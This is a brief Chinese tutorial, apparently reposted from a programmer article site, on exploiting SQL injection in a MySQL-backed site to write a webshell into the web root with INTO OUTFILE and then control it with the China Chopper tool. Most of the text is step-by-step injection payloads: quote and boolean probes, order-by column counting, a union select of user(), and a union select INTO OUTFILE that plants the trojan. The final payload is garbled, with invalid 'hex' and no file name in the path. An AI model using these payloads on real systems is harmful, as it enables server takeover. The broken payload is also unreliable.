SQL注入之木马上传
程序员文章站
2022-03-23 19:29:30
原理:利用MySQL中的写命令into outfile(固定式:select A into outfile B),在目标Web虚拟路径D:/WWW/下面生成一个木马文件 工具:中国...
原理:利用MySQL中的写命令into outfile(固定式:select A into outfile B),在目标Web虚拟路径D:/WWW/下面生成一个木马文件 工具:中国菜刀
1.首先查找SQL注入点
使用单引号'报错,使用and 1=1页面正常和and 1=2页面不正常,来判断存在SQL注入
2.使用order by猜测字段数量
id=1+order+by+2--+ //使用order by时,只有在使用比正确的值大时才会报错
3.使用union查询当前用户
id=1+union+select+user(),2--+ //当前用户为root, 猜测可能是file权限
4.写一句话木马到网站路径,木马要写成16进制
id=1+union+select+3c33tdfhdho,2 into outfile 'D:/www/'--+
5.菜刀连接
输入木马保存路径:D:\www\